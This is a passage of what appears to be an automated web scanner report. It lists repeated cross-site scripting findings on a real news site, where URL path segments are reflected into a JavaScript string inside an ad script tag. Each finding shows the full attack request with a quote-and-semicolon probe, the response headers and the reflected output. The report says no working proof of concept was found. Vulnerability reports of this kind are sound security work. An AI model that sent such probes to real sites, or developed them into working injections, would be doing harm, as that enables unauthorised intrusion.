Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news91d79'%3b8edda2a7d69/business-insider/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76139
Expires: Sun, 19 Dec 2010 03:10:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news91d79';8edda2a7d69/business-insider/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news91d79';8edda2a7d69;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83631043?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e64d5'%3be02aad2f8d9 was submitted in the REST URL parameter 2. This input was echoed as e64d5';e02aad2f8d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insidere64d5'%3be02aad2f8d9/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83435
Expires: Sun, 19 Dec 2010 03:10:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insidere64d5';e02aad2f8d9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insidere64d5';e02aad2f8d9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30835417?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bf26'%3b4023866e636 was submitted in the REST URL parameter 4. This input was echoed as 7bf26';4023866e636 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/39879677bf26'%3b4023866e636/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78912
Expires: Sun, 19 Dec 2010 03:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways-nail-first-impression/39879677bf26';4023866e636/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways-nail-first-impression;kw=39879677bf26';4023866e636;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7885c'%3b6d8892f2062 was submitted in the REST URL parameter 5. This input was echoed as 7885c';6d8892f2062 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/business-insider/ways+nail+first+impression/3987967/7885c'%3b6d8892f2062 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44327
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb9'%3b332834b26ae was submitted in the REST URL parameter 1. This input was echoed as c7cb9';332834b26ae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsc7cb9'%3b332834b26ae/economy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43266
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23396'%3bcca2d7dd2c5 was submitted in the REST URL parameter 2. This input was echoed as 23396';cca2d7dd2c5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy23396'%3bcca2d7dd2c5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfab'%3bb5657ebc138 was submitted in the REST URL parameter 1. This input was echoed as 2cfab';b5657ebc138 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2cfab'%3bb5657ebc138/economy/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77584
Expires: Sun, 19 Dec 2010 03:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news2cfab';b5657ebc138/economy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news2cfab';b5657ebc138;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98496123?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4482'%3b595e9a6b3a0 was submitted in the REST URL parameter 2. This input was echoed as e4482';595e9a6b3a0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economye4482'%3b595e9a6b3a0/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 90835
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economye4482';595e9a6b3a0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economye4482';595e9a6b3a0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=28719133?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e012'%3bed7a07312f0 was submitted in the REST URL parameter 4. This input was echoed as 2e012';ed7a07312f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/39960152e012'%3bed7a07312f0/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69569
Expires: Sun, 19 Dec 2010 03:10:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe-north-america/39960152e012';ed7a07312f0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe-north-america;kw=39960152e012';ed7a07312f0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=160
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6b5'%3b2734327df9e was submitted in the REST URL parameter 5. This input was echoed as 5d6b5';2734327df9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/economy/Europe+North+America/3996015/5d6b5'%3b2734327df9e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38125
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61908'%3b80f0b405c4b was submitted in the REST URL parameter 1. This input was echoed as 61908';80f0b405c4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news61908'%3b80f0b405c4b/energy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36429
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ef9'%3b742404652a1 was submitted in the REST URL parameter 2. This input was echoed as f4ef9';742404652a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energyf4ef9'%3b742404652a1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36392
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96160'%3bf94decf6ed was submitted in the REST URL parameter 1. This input was echoed as 96160';f94decf6ed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news96160'%3bf94decf6ed/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75926
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news96160';f94decf6ed/energy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news96160';f94decf6ed;kw=energy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=50020139?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44511'%3b8f538e1d670 was submitted in the REST URL parameter 2. This input was echoed as 44511';8f538e1d670 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy44511'%3b8f538e1d670/Suncor+deal+with+Total+directional+shift+says/3995942/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 89223
Expires: Sun, 19 Dec 2010 03:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy44511';8f538e1d670/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy44511';8f538e1d670;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68677683?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3480f'%3bb1bf66ee4c8 was submitted in the REST URL parameter 4. This input was echoed as 3480f';b1bf66ee4c8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/39959423480f'%3bb1bf66ee4c8/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70550
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/energy/suncor-deal-with-total-directional-shift-says/39959423480f';b1bf66ee4c8/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=energy;kw=suncor-deal-with-total-directional-shift-says;kw=39959423480f';b1bf66ee4c8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookie
...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa269'%3b0b5f135b547 was submitted in the REST URL parameter 5. This input was echoed as aa269';0b5f135b547 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/aa269'%3b0b5f135b547 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
